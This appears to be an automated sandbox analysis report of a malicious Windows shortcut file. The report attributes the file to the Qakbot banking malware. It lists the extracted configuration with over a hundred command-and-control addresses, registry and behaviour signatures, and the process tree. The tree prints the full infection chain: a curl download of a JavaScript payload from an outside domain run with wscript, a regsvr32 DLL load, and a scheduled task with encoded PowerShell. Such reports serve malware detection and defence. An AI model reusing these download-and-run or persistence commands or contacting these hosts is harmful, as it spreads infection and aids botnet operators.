Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
08-09-2022 18:57
Static task
static1
Behavioral task
behavioral1
Sample
doc/Valid155.lnk
Resource
win7-20220812-en
General
-
Target
doc/Valid155.lnk
-
Size
2KB
-
MD5
41c12342c2571e0030be5e2d167a836e
-
SHA1
a54d3181fddc3ab15cb482865a255a74052c4e56
-
SHA256
2b692ca392558fca23f219383cc7c23c4b3dca641a3e49c9b48f096df091273e
-
SHA512
4aeb1575dd294455b9f585b618ce7d3526e771a5fc98ea22b3231c5cc253e9f3bd2e0adfc4aefe4f566d62955f2cfe565ea5099f19bea6b908490f2ec7d8a42e
Malware Config
Extracted
qakbot
403.860
BB
1662647912
197.94.210.133:443
193.3.19.37:443
70.51.153.182:2222
99.232.140.205:2222
123.240.131.1:443
177.102.84.28:32101
105.156.152.227:443
190.59.247.136:995
89.211.218.88:2222
81.214.220.237:443
85.99.62.74:443
191.97.234.238:995
81.131.161.131:2078
217.165.68.122:993
219.69.103.199:443
37.210.148.30:995
64.207.215.69:443
113.169.57.104:443
179.225.221.169:32101
151.234.99.49:990
84.238.253.171:443
87.220.229.164:2222
42.118.158.96:443
61.105.45.244:443
27.73.215.46:32102
145.82.135.6:443
105.105.104.0:443
169.1.47.111:443
78.182.113.80:443
210.195.18.76:2222
113.53.59.10:995
88.246.170.2:443
95.10.13.82:443
171.248.157.128:995
118.68.220.199:443
139.195.63.45:2222
118.216.99.232:443
181.80.133.202:443
102.40.236.32:995
46.116.229.16:443
61.70.29.53:443
179.108.32.195:443
171.238.230.59:443
81.56.22.251:995
31.32.180.179:443
197.204.30.177:443
186.64.87.202:443
31.22.202.71:32101
120.150.218.241:995
173.189.167.21:995
24.139.72.117:443
104.34.212.7:32103
47.23.89.61:995
24.55.67.176:443
172.115.177.204:2222
217.165.77.134:995
24.178.196.158:2222
67.209.195.198:443
111.125.245.116:995
39.49.67.4:995
78.101.202.75:50010
37.34.253.233:443
217.165.77.134:443
46.107.48.202:443
70.46.220.114:443
63.143.92.99:995
93.48.80.198:995
179.158.103.236:443
47.180.172.159:443
47.23.89.61:993
72.252.157.93:995
182.191.92.203:995
187.172.230.151:443
72.252.157.93:990
24.158.23.166:995
32.221.224.140:995
41.84.238.19:443
41.228.22.180:443
197.167.27.20:993
45.46.53.140:2222
47.156.129.52:443
148.64.96.100:443
63.143.92.99:443
173.21.10.71:2222
66.230.104.103:443
76.25.142.196:443
100.38.242.113:995
208.107.221.224:443
197.89.12.179:443
39.44.34.119:995
196.203.37.215:80
39.57.40.50:995
117.248.109.38:21
121.7.223.38:2222
85.104.122.231:443
118.172.249.102:443
1.161.70.129:443
39.52.28.146:995
188.136.218.20:61202
212.70.96.76:995
1.161.70.129:995
174.69.215.101:443
69.14.172.24:443
86.213.191.206:2078
176.45.233.14:995
82.41.63.217:443
67.69.166.79:2222
217.164.237.54:2222
217.164.121.130:1194
39.41.114.133:995
100.38.242.113:443
120.61.3.17:443
101.50.120.124:995
217.128.122.65:2222
217.128.122.65:443
88.227.46.238:443
223.229.136.61:443
72.252.157.93:993
-
salt
SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
wscript.exeflow pid process 23 4320 wscript.exe 24 4320 wscript.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exewscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 3 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 3416 regsvr32.exe 3416 regsvr32.exe 3916 regsvr32.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 51 IoCs
Processes:
powershell.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\bdd36fa2 = 631b54ae1d9321e8be7a8e2934e58aee3bc73a56cab1be0540b8c6e760dff8ba01bbb5f9d0ce145cf8b4ca738be53439a75e5c6321c265fc385d255f9b1246d7c28917bf6c0e907ff68dbcd3b11beccc2b8c382d61a82b9718903a5e9b09442d709bdc5d93c7b7dc5606b913b38cd4cfce38 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\f544f066 = 953269c7a42a4e67b13a6cae12b5fe explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\56f08c7 = e79eb290bcc607a99230e96346fb6ada34661acbc9204eed2107b311f12230fdeb72cc4fbdad66619644dbb4763d269376b1198ab0407e8d explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\7867474d = 30f0619c86ff363e9e38487c1ccbe4b50fb75f33c9faddda8a20f227c0dade5243a202a53379368b3b5938ef7ed504d8eb26029656100e8d70c790588f2a3efc24d3e1004a12303175472a7019c38641dc99 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\8a0d9f90 = 7adc73dad614f5b28cd759b7f419afc54e220c3ad1e569f74457e7f2c9335afd558926c5e5a77278a722afffcacf62788b0eef3969c169b75a38d315ce69b120c47ae157970195e38fed095d238c8d explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\bf924fde = 25a199d6cb21bb30836def6d73ec3dc4db38ba82a5a4826da17366fa2a760c086b0b4bd042dcdc151f3048643ec4805336ba956f8cb12074374d123aec8445cdb7ba189d67b031af5c4352c891944a3d2e1f9389691b00d2037502b5a6a54d4eb6617c4224b8bd1655d523dd7798b6d8f00266aa2f7ff2f4cfc5c7bdb92ddd8a50d6c6a6c121265217a83d795e72733cdc780fa82c7e26617abe explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\c0db2028 = 106a959427f732ab15895bd73c54bf452dc4bc7f70d556bd480fa3f84bfb9282a56d4d5179316ed64882d87edafe270c25c82086aff2802564d82a4dd702b116b25aad8180d7e0fd38f26fedc5e25bae3bbae446c9c03da5138a6b0f62b17b5c689535ff555024c3d652749211db explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\72e28bb = 8fc746b571f11829448fca651c28d7ba62334b0a5f09e8e27cac296010bf3eea9dc81c4a0dcef4fea9da9f31d76f1f8f95a1c119bd6bf7cc43a470acba1d5d76fb9893b61a53b3be81b8292481815ca297339c1fab79b3aeaaf6a346b859131bfebf17e00d5a29ec59a7 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Pngzepolktjui\8a0d9f90 = 7adc64dad614c654220d59b78cb1f4ac7a7bd37f31710c861448a31eae14afe46f28c9e8a7442e79fef224316ee298a675968cca6851faf6f01cca6fc5cd45b176a9eb0b932f568f53ee0b9e1b7df88caa08a61bbdf45fc5902c36d525b5d9142104c695 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exeexplorer.exepid process 3416 regsvr32.exe 3416 regsvr32.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe 1780 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 3416 regsvr32.exe 3916 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2180 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
cmd.execmd.exewscript.execmd.exeregsvr32.exeregsvr32.exeexplorer.exepowershell.exeregsvr32.exeregsvr32.exedescription pid process target process PID 4108 wrote to memory of 2188 4108 cmd.exe cmd.exe PID 4108 wrote to memory of 2188 4108 cmd.exe cmd.exe PID 2188 wrote to memory of 1420 2188 cmd.exe curl.exe PID 2188 wrote to memory of 1420 2188 cmd.exe curl.exe PID 2188 wrote to memory of 4320 2188 cmd.exe wscript.exe PID 2188 wrote to memory of 4320 2188 cmd.exe wscript.exe PID 4320 wrote to memory of 2508 4320 wscript.exe cmd.exe PID 4320 wrote to memory of 2508 4320 wscript.exe cmd.exe PID 2508 wrote to memory of 4356 2508 cmd.exe PING.EXE PID 2508 wrote to memory of 4356 2508 cmd.exe PING.EXE PID 2508 wrote to memory of 4256 2508 cmd.exe regsvr32.exe PID 2508 wrote to memory of 4256 2508 cmd.exe regsvr32.exe PID 4256 wrote to memory of 3416 4256 regsvr32.exe regsvr32.exe PID 4256 wrote to memory of 3416 4256 regsvr32.exe regsvr32.exe PID 4256 wrote to memory of 3416 4256 regsvr32.exe regsvr32.exe PID 3416 wrote to memory of 1780 3416 regsvr32.exe explorer.exe PID 3416 wrote to memory of 1780 3416 regsvr32.exe explorer.exe PID 3416 wrote to memory of 1780 3416 regsvr32.exe explorer.exe PID 3416 wrote to memory of 1780 3416 regsvr32.exe explorer.exe PID 3416 wrote to memory of 1780 3416 regsvr32.exe explorer.exe PID 1780 wrote to memory of 4392 1780 explorer.exe schtasks.exe PID 1780 wrote to memory of 4392 1780 explorer.exe schtasks.exe PID 1780 wrote to memory of 4392 1780 explorer.exe schtasks.exe PID 2180 wrote to memory of 3544 2180 powershell.exe regsvr32.exe PID 2180 wrote to memory of 3544 2180 powershell.exe regsvr32.exe PID 3544 wrote to memory of 3916 3544 regsvr32.exe regsvr32.exe PID 3544 wrote to memory of 3916 3544 regsvr32.exe regsvr32.exe PID 3544 wrote to memory of 3916 3544 regsvr32.exe regsvr32.exe PID 3916 wrote to memory of 1016 3916 regsvr32.exe explorer.exe PID 3916 wrote to memory of 1016 3916 regsvr32.exe explorer.exe PID 3916 wrote to memory of 1016 3916 regsvr32.exe explorer.exe PID 3916 wrote to memory of 1016 3916 regsvr32.exe explorer.exe PID 3916 wrote to memory of 1016 3916 regsvr32.exe explorer.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\doc\Valid155.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c echo 'HI_U' && MD "C:\Users\Admin\AppData\Local\ur\B4O" && curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html && cd "C:\Users\Admin\AppData\Local\ur\B4O" && wscript enhrP.s_1L.QH0w.js && echo "Nj"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html3⤵
-
C:\Windows\system32\wscript.exewscript enhrP.s_1L.QH0w.js3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping go.com && regsvr32 _WUF.dll4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping go.com5⤵
- Runs ping.exe
-
C:\Windows\system32\regsvr32.exeregsvr32 _WUF.dll5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe_WUF.dll6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /Z /ST 21:00 /tn vepennhq /ET 21:11 /tr "powershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHIAXABCADQATwBcAF8AVwBVAEYALgBkAGwAbAAiAA==" /SC ONCE8⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXAB1AHIAXABCADQATwBcAF8AVwBVAEYALgBkAGwAbAAiAA==1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeC:\Users\Admin\AppData\Local\ur\B4O\_WUF.dll3⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dllFilesize
548KB
MD5640c452ee47770d7d77a0c0ae1a8c4bb
SHA1e095fedc8f40d5b76e76adbc7cce1e22720b14ba
SHA2561b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290
SHA512f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a
-
C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dllFilesize
548KB
MD5640c452ee47770d7d77a0c0ae1a8c4bb
SHA1e095fedc8f40d5b76e76adbc7cce1e22720b14ba
SHA2561b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290
SHA512f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a
-
C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dllFilesize
548KB
MD5640c452ee47770d7d77a0c0ae1a8c4bb
SHA1e095fedc8f40d5b76e76adbc7cce1e22720b14ba
SHA2561b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290
SHA512f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a
-
C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dllFilesize
548KB
MD5640c452ee47770d7d77a0c0ae1a8c4bb
SHA1e095fedc8f40d5b76e76adbc7cce1e22720b14ba
SHA2561b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290
SHA512f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a
-
C:\Users\Admin\AppData\Local\ur\B4O\_WUF.dllFilesize
548KB
MD5640c452ee47770d7d77a0c0ae1a8c4bb
SHA1e095fedc8f40d5b76e76adbc7cce1e22720b14ba
SHA2561b4f615fe1136b4b0f035ed99570e8773e5e74d926735bd0b3ba0f86f30ca290
SHA512f35fc0475a129639dacd1403b467d85e1b368545b1ce23dd02b9e28370b08ad8c7c7fbaea80005872bf8ee79f5e0841e4a71c0a26d378b13e9d7ddbe9e45f80a
-
C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.jsFilesize
132KB
MD5253ad74e5aa214a0bf29e646c4b3879f
SHA18ab4bb418dbe65a02ecf0d0fd5c4f0dff4d3a603
SHA256bf1cfd9542d706afd19954100f90b3b2558c6ec5b885b2cbd8dc451ebd860630
SHA51216dbc08740d0ead7159d8e528df902eb962ea4a4f785566aba2f9ceacb85eb755da258f577ab8063448796e8628a5e7b91006f0b17c47b13071f2647b1cc620c
-
memory/1016-162-0x0000000000EA0000-0x0000000000EC2000-memory.dmpFilesize
136KB
-
memory/1016-161-0x0000000000EA0000-0x0000000000EC2000-memory.dmpFilesize
136KB
-
memory/1016-159-0x0000000000000000-mapping.dmp
-
memory/1420-133-0x0000000000000000-mapping.dmp
-
memory/1780-148-0x0000000000D70000-0x0000000000D92000-memory.dmpFilesize
136KB
-
memory/1780-150-0x0000000000D70000-0x0000000000D92000-memory.dmpFilesize
136KB
-
memory/1780-146-0x0000000000000000-mapping.dmp
-
memory/2180-151-0x00000182C7B50000-0x00000182C7B72000-memory.dmpFilesize
136KB
-
memory/2180-156-0x00007FFE34AB0000-0x00007FFE35571000-memory.dmpFilesize
10.8MB
-
memory/2188-132-0x0000000000000000-mapping.dmp
-
memory/2508-136-0x0000000000000000-mapping.dmp
-
memory/3416-140-0x0000000000000000-mapping.dmp
-
memory/3416-147-0x0000000000ED0000-0x0000000000EF2000-memory.dmpFilesize
136KB
-
memory/3416-145-0x0000000000ED0000-0x0000000000EF2000-memory.dmpFilesize
136KB
-
memory/3416-144-0x0000000000EA0000-0x0000000000EC4000-memory.dmpFilesize
144KB
-
memory/3416-143-0x0000000000950000-0x00000000009D6000-memory.dmpFilesize
536KB
-
memory/3544-152-0x0000000000000000-mapping.dmp
-
memory/3916-154-0x0000000000000000-mapping.dmp
-
memory/3916-157-0x0000000003BA0000-0x0000000003BC4000-memory.dmpFilesize
144KB
-
memory/3916-158-0x0000000003BF0000-0x0000000003C12000-memory.dmpFilesize
136KB
-
memory/3916-160-0x0000000003BF0000-0x0000000003C12000-memory.dmpFilesize
136KB
-
memory/4256-138-0x0000000000000000-mapping.dmp
-
memory/4320-134-0x0000000000000000-mapping.dmp
-
memory/4356-137-0x0000000000000000-mapping.dmp
-
memory/4392-149-0x0000000000000000-mapping.dmp